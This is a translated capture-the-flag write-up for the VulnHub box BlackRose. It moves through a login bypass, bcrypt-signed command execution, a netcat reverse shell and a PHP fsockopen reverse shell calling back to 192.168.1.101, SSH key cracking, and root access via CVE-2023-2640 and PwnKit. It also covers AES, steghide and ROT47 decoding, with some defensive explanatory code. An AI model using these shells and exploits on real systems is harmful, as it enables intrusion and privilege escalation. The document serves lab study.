BlackRose box

Information gathering

```
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ sudo nmap --min-rate 10000 -p- 192.168.1.21

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
```
```
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ mysql 192.168.1.21 -u root -p
Enter password:
ERROR 2002 (HY000): Can't connect to local server through socket '/run/mysqld/mysqld.sock' (2)
```
```
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ sudo nmap -sT -sV -sC -O -p22,80,3306 192.168.1.21

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d1:9b:10:88:15:e9:7a:c4:1a:29:07:3c:21:87:c4:ac (RSA)
| 256 e3:50:0b:c9:e8:f1:68:7f:e7:cf:ec:de:7b:b9:20:a1 (ECDSA)
|_ 256 55:0e:96:22:cc:50:20:d9:dd:c2:ff:5b:25:d0:d7:2b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: BlackRose
|_Requested resource was login.php
3306/tcp open mysql MySQL (unauthorized)

Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
```
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ sudo nmap --script=vuln -p22,80,3306 192.168.1.21

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-cookie-flags:
| /:
| PHPSESSID:
| httponly flag not set
| /login.php:
| PHPSESSID:
|_ httponly flag not set
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|_ /login.php: Possible admin folder
3306/tcp open mysql
```

Web penetration testing

Opening the page shows only a login form. I tried some simple SQL injection, without success. I also tried registering a new user to look for authorization or other logic flaws, and found none.

After logging in there appears to be a place to execute commands, but I am not admin and cannot execute anything.

```
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ sudo dirsearch -u http://192.168.1.21

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Target: http://192.168.1.21/

[05:27:16] Starting:
[05:27:17] 301 - 309B - /js -> http://192.168.1.21/js/
[05:27:19] 200 - 21B - /404.php
[05:27:31] 301 - 310B - /css -> http://192.168.1.21/css/
[05:27:31] 302 - 0B - /database.php -> 404.php
[05:27:33] 200 - 21B - /footer.php
[05:27:34] 200 - 21B - /header.php
[05:27:34] 301 - 313B - /images -> http://192.168.1.21/images/
[05:27:34] 302 - 0B - /images/ -> ../404.php
[05:27:35] 301 - 310B - /img -> http://192.168.1.21/img/
[05:27:35] 302 - 0B - /index.php -> login.php
[05:27:35] 302 - 0B - /index.php/login/ -> login.php
[05:27:36] 302 - 0B - /js/ -> ../404.php
[05:27:37] 200 - 1KB - /login.php
[05:27:37] 302 - 0B - /logout.php -> 404.php
[05:27:43] 200 - 2KB - /register.php
[05:27:44] 403 - 277B - /server-status/
[05:27:44] 403 - 277B - /server-status
[05:27:49] 302 - 0B - /vendors/ -> ../404.php
```

Directory brute-forcing turned up no new attack surface.

I tried weak-password brute-forcing, which failed. I fuzzed the command-execution interface with Burp's built-in wordlists, which also failed.

Login bypass

I was stuck here for quite a while with no ideas, so I went and looked at a walkthrough, which mentioned login bypass. Googling "login bypass" led to:

Login Bypass - HackTricks

Appending [] to the passwd field bypassed the login, and I was logged in as the admin user.

Reverse shell

The indexcsrf token expires quite quickly; if you get a timeout, refresh the page. It seems only the whoami command can be used; other commands produce an error.

Copy the Signature value and crack it with john

```
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ sudo john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
whoami (?)
```

It seems the Signature value has to be the hash of the command, and the hash algorithm is bcrypt. I used a random online site, Bcrypt-Generator.com - Generate, Check, Hash, Decode Bcrypt Strings, to get the hash of id, which confirmed my guess.
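Why a Signature of this kind does not authenticate anything, as an added example that is not code from the box or from the write-up: a bcrypt hash of the command text contains no secret, so any client that knows the scheme can produce a valid one for any command. The hardened variant below signs the command with an HMAC under a server-held key and additionally checks an allow-list. sha256 stands in for bcrypt so the example runs on the standard library alone, and the key and allow-list are constructed for the demo.

```python
import hashlib
import hmac

# Constructed values for the demo: the key would exist only on the server,
# and the allow-list is whatever the application legitimately needs to run.
ALLOWED_COMMANDS = {"whoami", "id"}
SERVER_KEY = b"constructed-server-side-secret"


def unkeyed_signature(command: str) -> str:
    """The weak scheme: a plain hash of the command with no secret mixed in
    (sha256 here stands in for the box's bcrypt; the property is the same)."""
    return hashlib.sha256(command.encode()).hexdigest()


def verify_unkeyed(command: str, signature: str) -> bool:
    return hmac.compare_digest(unkeyed_signature(command), signature)


def keyed_signature(command: str, key: bytes) -> str:
    """The hardened scheme: HMAC-SHA256 over the command under a server key."""
    return hmac.new(key, command.encode(), hashlib.sha256).hexdigest()


def verify_keyed(command: str, signature: str, key: bytes) -> bool:
    """Constant-time HMAC check plus an allow-list, so that even a correctly
    signed request cannot run an arbitrary command."""
    if command not in ALLOWED_COMMANDS:
        return False
    return hmac.compare_digest(keyed_signature(command, key), signature)


def demo() -> dict:
    # A client that knows only the algorithm can mint a valid unkeyed signature
    # for any command it likes; this is what made the box's check bypassable.
    unkeyed_forged = verify_unkeyed("uname -a", unkeyed_signature("uname -a"))

    # The same client lacks SERVER_KEY, so its best guess is rejected by HMAC.
    guessed = hmac.new(b"wrong-key", b"uname -a", hashlib.sha256).hexdigest()
    keyed_forged = verify_keyed("uname -a", guessed, SERVER_KEY)

    # A legitimately signed, allow-listed command still passes ...
    keyed_legit = verify_keyed("whoami", keyed_signature("whoami", SERVER_KEY), SERVER_KEY)
    # ... while a correctly signed command outside the allow-list does not.
    keyed_unlisted = verify_keyed("uname -a", keyed_signature("uname -a", SERVER_KEY), SERVER_KEY)

    return {
        "unkeyed_forged": unkeyed_forged,   # True: the weakness
        "keyed_forged": keyed_forged,       # False
        "keyed_legit": keyed_legit,         # True
        "keyed_unlisted": keyed_unlisted,   # False
    }


if __name__ == "__main__":
    print(demo())
```

The point to take from this is that "the signature is a bcrypt hash" is a format, not an authentication mechanism: bcrypt's salt and cost only slow down guessing of an unknown input, and here the input (the command) is chosen by the client.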

Find some reverse shell code; you may need to try several, as some work and some fail

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.1.101 443 >/tmp/f
```

Obtained the hashed value from the online site

```
$2a$10$v49VHIVsiGtoUeTaZdbTuuaWpnkS92o5/G5MZaHloHkFWRro7buoq
```

Edit the page source directly in the browser, then click Run

Reverse shell obtained. Note that you may need to swap reverse shell payloads repeatedly, since some of them do not work

```
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.21] 51246
bash: cannot set terminal process group (1121): Inappropriate ioctl for device
bash: no job control in this shell
www-data@BlackRose:/var/www/html$ whoami
whoami
www-data
www-data@BlackRose:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@BlackRose:/var/www/html$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:98:92:98 brd ff:ff:ff:ff:ff:ff
inet 192.168.1.21/24 brd 192.168.1.255 scope global enp0s3
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fe98:9298/64 scope link
valid_lft forever preferred_lft forever
www-data@BlackRose:/var/www/html$ uname -a
uname -a
Linux BlackRose 4.15.0-69-generic #78-Ubuntu SMP Wed Nov 6 11:30:24 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
www-data@BlackRose:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on BlackRose:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on BlackRose:
(delx : delx) NOPASSWD: /bin/ld.so
```

sudo -l gave something that looked useful

Found the exploitation technique on GTFOBins.

This kernel version looks like it could be exploited for kernel privilege escalation. Gather information first

```
www-data@BlackRose:/var/www/html$ sudo -u delx /bin/ld.so /bin/bash -p
sudo -u delx /bin/ld.so /bin/bash -p
whoami
delx
id
uid=1002(delx) gid=1002(delx) groups=1002(delx)
ls -alih /home
total 16K
1179649 drwxr-xr-x 4 root root 4.0K Nov 9 2019 .
2 drwxr-xr-x 24 root root 4.0K Nov 13 2019 ..
1179652 drwxr-xr-x 6 delx delx 4.0K Dec 5 2019 delx
1183766 drwx------ 5 yourname yourname 4.0K Dec 5 2019 yourname
```

Let's look at the web root first

```
ls -alih
total 76K
266386 drwxr-xr-x 8 root root 4.0K Jul 11 2020 .
3153970 drwxr-xr-x 3 root root 4.0K Nov 7 2019 ..
266400 -rw-r--r-- 1 root root 37 Nov 13 2019 404.php
262153 -rw-r--r-- 1 root root 1.2K Dec 5 2019 RL.php
262150 -rw-r--r-- 1 root root 1.2K Nov 26 2019 RP.php
262148 -rw-r--r-- 1 root root 956 Nov 26 2019 Rx.php
397314 drwxrwxr-x 5 root root 4.0K Oct 22 2019 bootstrap
793475 drwxrwxr-x 2 root root 4.0K Nov 15 2019 css
266801 -rw-r--r-- 1 root root 1.4K Nov 10 2019 database.php
397308 -rw-r--r-- 1 root root 303 Dec 1 2019 footer.php
262152 -rw-r--r-- 1 root root 364 Dec 1 2019 header.php
924595 drwxrwxr-x 2 root root 4.0K Oct 22 2019 images
397310 drwxrwxrwx 2 root root 4.0K Dec 5 2019 img
262151 -rw-r--r-- 1 root root 3.6K Nov 26 2019 index.php
666484 drwxrwxr-x 2 root root 4.0K Nov 13 2019 js
397363 -rw-rw-r-- 1 root root 1.2K Nov 26 2019 login.php
397364 -rw-r--r-- 1 root root 198 Dec 1 2019 logout.php
397309 -rw-rw-r-- 1 root root 1.3K Dec 1 2019 register.php
793409 drwxrwxr-x 20 root root 4.0K Oct 22 2019 vendors
```

The web root contains database.php, which holds the database password

```php
define("user", "root");
define("pass", "howareyoubuddy");
define("data", "Dw");
define("host", "127.0.0.1");
```

Tried switching user with this password; it failed

```
cd ~
ls -alih
total 36K
1179652 drwxr-xr-x 6 delx delx 4.0K Dec 5 2019 .
1179649 drwxr-xr-x 4 root root 4.0K Nov 9 2019 ..
1183918 lrwxrwxrwx 1 delx delx 9 Dec 3 2019 .bash_history -> /dev/null
1179654 -rw-r--r-- 1 delx delx 220 Nov 7 2019 .bash_logout
1179655 -rw-r--r-- 1 delx delx 3.7K Dec 3 2019 .bashrc
1183761 drwx------ 2 delx delx 4.0K Nov 7 2019 .cache
1183759 drwx------ 3 delx delx 4.0K Nov 7 2019 .gnupg
1575430 drwxrwxr-x 3 delx delx 4.0K Dec 1 2019 .local
1179653 -rw-r--r-- 1 delx delx 807 Nov 7 2019 .profile
1183756 drwx------ 2 delx delx 4.0K Nov 7 2019 .ssh
```

In the user's home directory there is a .ssh directory; let's take a look inside

```
cd .ssh
ls -alih
total 20K
1183756 drwx------ 2 delx delx 4.0K Nov 7 2019 .
1179652 drwxr-xr-x 6 delx delx 4.0K Dec 5 2019 ..
1183764 -rw-r--r-- 1 delx delx 390 Nov 7 2019 authorized_keys
1183757 -rw------- 1 delx delx 1.8K Nov 7 2019 id_rsa
1183758 -rw-r--r-- 1 delx delx 390 Nov 7 2019 id_rsa.pub
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,EC100EF5AB09B47D4E9774BD2A5263F7
-----END RSA PRIVATE KEY-----
```

Got an SSH private key; try logging in over SSH with it

```
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ chmod 400 id_rsa

┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ ssh -i id_rsa delx@192.168.1.21
The authenticity of host '192.168.1.21 (192.168.1.21)' can't be established.
ED25519 key fingerprint is SHA256:wc/f/+tP1y7HbxIJA9NHM2yXxP+Hm+8B/vKQk5XAsT4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.21' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
```

A passphrase is required, so john to the rescue

```
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ ssh2john id_rsa > sshhash

┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ sudo john sshhash --wordlist=/usr/share/wordlists/rockyou.txt
[sudo] password for kali:
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
doggiedog (id_rsa)
1g 0:00:00:00 DONE (2023-10-12 09:44) 11.11g/s 3454Kp/s 3454Kc/s 3454KC/s dolcegabanna..dodgers9
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

Use doggiedog as the private key passphrase to log in over SSH

```
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ ssh -i id_rsa delx@192.168.1.21
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-69-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Thu Oct 12 13:44:22 UTC 2023

System load: 0.0 Processes: 105
Usage of /: 11.0% of 48.96GB Users logged in: 0
Memory usage: 72% IP address for enp0s3: 192.168.1.21
Swap usage: 0%


201 packages can be updated.
153 updates are security updates.


Last login: Thu Dec 5 21:57:42 2019 from 192.168.1.123
```

Try whether the passphrase is also this user's password

```
delx@BlackRose:~$ sudo -l
[sudo] password for delx:
Sorry, try again.
[sudo] password for delx:
sudo: 1 incorrect password attempt
```

It is not.

```
delx@BlackRose:~$ gcc --version
gcc (Ubuntu 7.4.0-1ubuntu1~18.04.1) 7.4.0
Copyright (C) 2017 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
```

gcc is available, so kernel privilege escalation is an option. Next I ran linpeas for information gathering and looked at the web root, the permissions of the shadow file, the user home directories, and a few unusual files and archives.

The only find was that /usr/local/.../showPassword is unusual, but I did not know how to extract anything useful from it. strings showed some odd characters, but entering them did not work either. Patience -1, -1, -1

Kernel privilege escalation

Attempting kernel privilege escalation, I first tried a fairly recent exploit, CVE-2023-2640, and got root

```
delx@BlackRose:/tmp$ unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'
uid=0(root) gid=1002(delx) groups=1002(delx)
delx@BlackRose:/tmp$ unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
mkdir: cannot create directory ‘l’: File exists
mkdir: cannot create directory ‘u’: File exists
mkdir: cannot create directory ‘w’: File exists
mkdir: cannot create directory ‘m’: File exists
root@BlackRose:/tmp# cd /root
root@BlackRose:/root# ls -liah
total 36K
2097153 drwx------ 6 root root 4.0K Jul 11 2020 .
2 drwxr-xr-x 24 root root 4.0K Nov 13 2019 ..
2097158 lrwxrwxrwx 1 root root 9 Dec 3 2019 .bash_history -> /dev/null
2097154 -rw-r--r-- 1 root root 3.1K Dec 3 2019 .bashrc
2097164 drwx------ 2 root root 4.0K Dec 5 2019 .cache
2097162 drwx------ 3 root root 4.0K Nov 7 2019 .gnupg
2097159 drwxr-xr-x 3 root root 4.0K Nov 7 2019 .local
2097155 -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
2097168 -rw-r--r-- 1 root root 511 Jul 11 2020 root.txt
2097156 drwx------ 2 root root 4.0K Sep 7 2019 .ssh
root@BlackRose:/root# cat root.txt
_ _ _
| | _____ _____| | __ ____ _ ___ | |__ ___ _ __ ___
_ | |/ _ \ \ /\ / / _ \ | \ \ /\ / / _` / __| | '_ \ / _ \ '__/ _ \
| |_| | __/\ V V / __/ | \ V V / (_| \__ \ | | | | __/ | | __/
\___/ \___| \_/\_/ \___|_| \_/\_/ \__,_|___/ |_| |_|\___|_| \___|
The box made by Jewel

7dcbcf000f38c8d2c0024011899ec84e

I thank you so much for playing - Jewel 😀
```

Then I tried the first exploit recommended by linpeas, cve-2021-4034, which also got root

```
delx@BlackRose:/tmp/CVE-2021-4034-main$ ls
cve-2021-4034.c cve-2021-4034.sh dry-run LICENSE Makefile pwnkit.c README.md
delx@BlackRose:/tmp/CVE-2021-4034-main$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.
delx@BlackRose:/tmp/CVE-2021-4034-main$ ls
cve-2021-4034 cve-2021-4034.sh gconv-modules LICENSE pwnkit.c README.md
cve-2021-4034.c dry-run 'GCONV_PATH=.' Makefile pwnkit.so
delx@BlackRose:/tmp/CVE-2021-4034-main$ ./cve-2021-4034
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),1002(delx)
```

The intended attack path

Mainly referencing BlackRose: 1-VulnHub (qq.com)

We had already found the /usr/local/.../showPassword file earlier but did not know what to do with it. Here some simple reverse engineering is needed: loading it into IDA reveals a string that is probably used in a comparison: gqSFGqAJ

```
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ ./showPassword
root@username:~# gqSFGqAJ
Good luck buddy :)

┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ ./showPassword
root@username:~# 123
person who wrote me,he says it's wrong 😀
```

JqT/3t/ucYLw/dlb6c5PzmQM9lRYjuRIPgCmcHP+RTE= looks like an encrypted or encoded string

The AES decryption used below had to be guessed. Generally, if there is a key it is a symmetric algorithm; the common symmetric algorithms are DES, 3DES, Blowfish, IDEA, RC4, RC5, RC6 and AES. There is no shortcut here; you can only try them one by one. Also, the key length is 8, which is 32 bits when converted to bytes, and that narrows the range a little.

Decrypt using the online site AES encryption

RkZiPVkvxykJVOmxBmitBPeJXqFuxM

One thing that puzzles me is that AES actually has additional parameters, such as the padding mode, which this site does not show at all. So if I wanted to work out the AES decryption myself, how would I go about it?

Summary of the answer from 红队笔记 (Red Team Notes):

First question: how do you tell that it is the result of AES encryption?
In this case it is actually not easy even to think of gqSFGqAJ as the key, because it takes some imaginative filling-in; you only arrive at it after being stuck for a while and thinking and trying in every direction. More than anything, it is familiarity with how and how often encryption algorithms are used that lets the idea occur to you.
Second question: how do you use AES to decrypt it?
The simplified way of thinking: the site aesencryption.net is still available today, and as the walkthrough you read shows, it recovers the plaintext password. The box author presumably used this site to generate it when building the box, and because aesencryption.net is fairly common, people doing the box search online, try it, and get through.
AES encryption involves many parameters, all of which the site defaults or even ignores. At least these questions are involved:

  1. AES ciphertext and plaintext generally need padding; which scheme?
  2. How is the key size determined, and how is a short key padded? There are common mechanisms, but not a unique one.
  3. Most importantly, aesencryption.net has no IV option; does it use ECB mode, which needs no IV?

Reversing aesencryption.net, the answers to the questions above are:

  1. PKCS #7 is used.
  2. The key is padded with 0 to 32 bytes, 256 bits.
  3. CBC is used, and the IV is the peculiar, arbitrary value 12345678b0z2345n.
```python
import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

def decrypt_aes(string_from_passwordapp, key_text, iv_re_from_aesencryption):
    """
    Decrypt a Base64-encoded ciphertext with AES.

    Parameters:
    - string_from_passwordapp (str): the Base64-encoded ciphertext obtained from the password program.
    - key_text (str): the key used for AES.
    - iv_re_from_aesencryption (str): the initialization vector recovered from the AES encryption site.

    Returns:
    - str: the decrypted plaintext.

    Raises:
    - ValueError: decryption failed or Base64 decoding failed.
    """

    # Make sure the key is 32 bytes long (NUL-padded), as required for AES-256
    key = key_text.ljust(32, '\0').encode()
    iv = iv_re_from_aesencryption.encode()

    try:
        # Decode the Base64 ciphertext from the password program into raw bytes
        encrypted_data = base64.b64decode(string_from_passwordapp)

        # Decrypt with AES in CBC mode
        cipher = AES.new(key, AES.MODE_CBC, iv)
        decrypted_text = cipher.decrypt(encrypted_data)

        # Strip the PKCS7 padding
        return unpad(decrypted_text, AES.block_size, style='pkcs7').decode()

    except (ValueError, AttributeError):
        raise ValueError("Decryption failed or Base64 decoding failed.")

if __name__ == "__main__":
    # The values recovered above
    key_text = "gqSFGqAJ"
    iv_re_from_aesencryption = "12345678b0z2345n"
    string_from_passwordapp = "JqT/3t/ucYLw/dlb6c5PzmQM9lRYjuRIPgCmcHP+RTE="

    try:
        plain_text = decrypt_aes(string_from_passwordapp, key_text, iv_re_from_aesencryption)
        print(plain_text)
    except ValueError as e:
        print(e)
```

Possible problems and their answers:

Building on the above, entering gqSFGqAJ000000000000000000000000 as a UTF-8 key still failed. So I first added a Hex layer to confirm that the base64 decoding result was fine, and set the AES Decrypt input to hex, which confirmed that the problem was in the AES Decrypt layer. The only controllable parameters there are the Key and the IV, and after repeated attempts I got the following working result

```
https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)AES_Decrypt(%7B'option':'Hex','string':'677153464771414a000000000000000000000000000000000000000000000000'%7D,%7B'option':'UTF8','string':'12345678b0z2345n'%7D,'CBC','Raw','Raw',%7B'option':'Hex','string':''%7D,%7B'option':'Hex','string':''%7D)&input=SnFULzN0L3VjWUx3L2RsYjZjNVB6bVFNOWxSWWp1UklQZ0NtY0hQK1JURT0
```

Changing the key from the UTF-8 string gqSFGqAJ000000000000000000000000 to the hex string 677153464771414a000000000000000000000000000000000000000000000000 makes it work. After consulting some references, my judgement is that with UTF-8 input the digit 0 is encoded in UTF-8 exactly as in ASCII, 00110000, and if you want to represent the actual binary 00000000 you run into a new problem, the null-byte problem. So in CyberChef, when a key needs zero padding, the key can only be entered as hex. Verification with the password toolbox:

There is one more thing we overlooked: what this string is for. The page has a background image; let's download it and examine it locally

```
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ exiftool background-image.jpg
ExifTool Version Number : 12.57
File Name : background-image.jpg
Directory : .
File Size : 181 kB
File Modification Date/Time : 2019:12:05 06:57:08-05:00
File Access Date/Time : 2023:10:12 09:01:47-04:00
File Inode Change Date/Time : 2023:10:12 09:01:47-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 300
Y Resolution : 300
Image Width : 960
Image Height : 640
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 960x640
Megapixels : 0.614

┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ steghide info background-image.jpg
"background-image.jpg":
format: jpeg
capacity: 10.9 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!
```

steghide needs a passphrase to extract the data; use the string decrypted above as the passphrase

```
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ steghide info background-image.jpg
"background-image.jpg":
format: jpeg
capacity: 10.9 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "password":
size: 31.0 Byte
encrypted: rijndael-128, cbc
compressed: yes

┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ steghide extract -sf background-image.jpg
Enter passphrase:
wrote extracted data to "password".

┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ cat password
s)M8Z=7|8/&YY-zK5L$.w3Su'Q@nGR
```

The string s)M8Z=7|8/&YY-zK5L$.w3Su'Q@nGR again calls for trying ciphers and encodings

This password still looks encoded; after some searching, it turned out to be rot47

I was puzzled by this description and judgement; I found one approach in a blog post: BlackRose: 1 Walkthrough (Vulnhub) | by Shubham Kumar | Medium

The tool used is oreosES/autodecoder: AutoDecoder tool for CTFs (github.com)

```
┌──(kali㉿kali)-[~/tools/autodecoder]
└─$ python3 audodecoder.py --message "s)M8Z=7|8/&YY-zK5L$.w3Su'Q@nGR"

atbash > atbash: SMZYYZKLWSUQNGR
atbash > caesar: KQDEEDSRGKIMPWL
atbash > rot13: UANOONCBQUSWZGV
atbash > rot47: w}pqqp!~swuy|%x
caesar > atbash: YKXYYRMLUEWGDQF
caesar > caesar: E)S8F=7|8/&EE-LQ5R$.I3YG'W@ZMX
caesar > rot13: O)C8P=7|8/&OO-VA5B$.S3IQ'G@JWH
caesar > rot47: qX!grlfMg^Uqq\x}d~S]ub'sV%o(y&
rot13 > atbash: UANOONCBQUSWZGV
rot13 > caesar: O)C8P=7|8/&OO-VA5B$.S3IQ'G@JWH
rot13 > rot13: s)M8Z=7|8/&YY-zK5L$.w3Su'Q@nGR
rot13 > rot47: 7X+g|lfMg^U{{\>)d*S];bu9Vso2%t
rot47 > atbash: WCTOUNTFPAWHSYUELE
rot47 > caesar: GA|P+UOPP^X**\NIM{V]KK$IY"X?E#
rot47 > rot13: QK|t+ysZt^H**\Xmq{F]Uo$SI"b?i#
rot47 > rot47: s)M8Z=7|8/&YY-zK5L$.w3Su'Q@nGR
```

From the results one can judge that it is probably rot13 or rot47

Use DX|g+lfMg^U**\Kzd{S]Hb$FV"o?v# to switch to the yourname user
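ROT13 and ROT47 as two instances of one rotation over a contiguous character range, as an added example (not code from the write-up or from autodecoder). The input is the string extracted from the image above, and the expected output is the yourname password given in the text; the triage helper encodes the hint the autodecoder output illustrates, namely that ROT13 leaves digits and symbols untouched, so a symbol-heavy token that still looks like a password is a reason to try ROT47 first.

```python
def rot_range(text: str, shift: int, lo: int, hi: int) -> str:
    """Rotate every character whose code point lies in [lo, hi] by `shift`
    positions within that range; characters outside the range pass through."""
    width = hi - lo + 1
    out = []
    for ch in text:
        code = ord(ch)
        if lo <= code <= hi:
            out.append(chr(lo + (code - lo + shift) % width))
        else:
            out.append(ch)
    return "".join(out)


def rot47(text: str) -> str:
    """ROT47: rotate the 94 printable ASCII characters '!' (33) .. '~' (126) by 47.
    Applying it twice returns the input, which is why autodecoder's
    'rot47 > rot47' line above shows the original string."""
    return rot_range(text, 47, 33, 126)


def rot13(text: str) -> str:
    """ROT13: rotate A-Z and a-z separately by 13; digits and symbols are untouched."""
    return rot_range(rot_range(text, 13, ord("A"), ord("Z")), 13, ord("a"), ord("z"))


def looks_like_rot47_candidate(s: str) -> bool:
    """Cheap triage before trying ROT47: every character must be inside the
    printable range ROT47 covers, and the token should mix digits and symbols
    with letters (ROT13 could not have produced the digits and symbols)."""
    if not s or any(not 33 <= ord(c) <= 126 for c in s):
        return False
    has_symbol = any(not c.isalnum() for c in s)
    has_digit = any(c.isdigit() for c in s)
    return has_symbol and has_digit


def demo() -> dict:
    extracted = "s)M8Z=7|8/&YY-zK5L$.w3Su'Q@nGR"   # the steghide output from the write-up
    return {
        "candidate": looks_like_rot47_candidate(extracted),
        "rot47": rot47(extracted),                 # the yourname password
        "rot13": rot13(extracted),                 # digits and symbols unchanged
        "rot47_twice": rot47(rot47(extracted)),    # back to the input
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```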

```
yourname@BlackRose:~$ cat user.txt
688286be9a2df84e90122da12cd7ea2e
yourname@BlackRose:~$ sudo -l
Matching Defaults entries for yourname on BlackRose:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User yourname may run the following commands on BlackRose:
(root : root) NOPASSWD: /usr/bin/blackrose
```

Found an unusual program that can be run as root without a password

Next there is another hard-to-guess point about this program: when run it asks for a file to read, but an ordinary file name is reported as invalid

```
yourname@BlackRose:~$ sudo /usr/bin/blackrose
File read~# /etc/passwd
Invalid file read
```

The program only accepts the path of a PHP file, and its permissions mean we cannot pull it down for local reversing. So figuring out the accepted file type is another easy place to get stuck

```
yourname@BlackRose:~$ ls -liah /usr/bin/blackrose
2502921 -rwx------ 1 root root 1.3K Dec 1 2019 /usr/bin/blackrose
```

Then we write the reverse shell into 1.php

```
yourname@BlackRose:~$ echo '<?php $sock=fsockopen("192.168.1.101",443);system("/bin/bash <&3 >&3 2>&3"); ?>' > 1.php
yourname@BlackRose:~$ sudo /usr/bin/blackrose ./1.php
File read~# 1.php
Dangerous function found
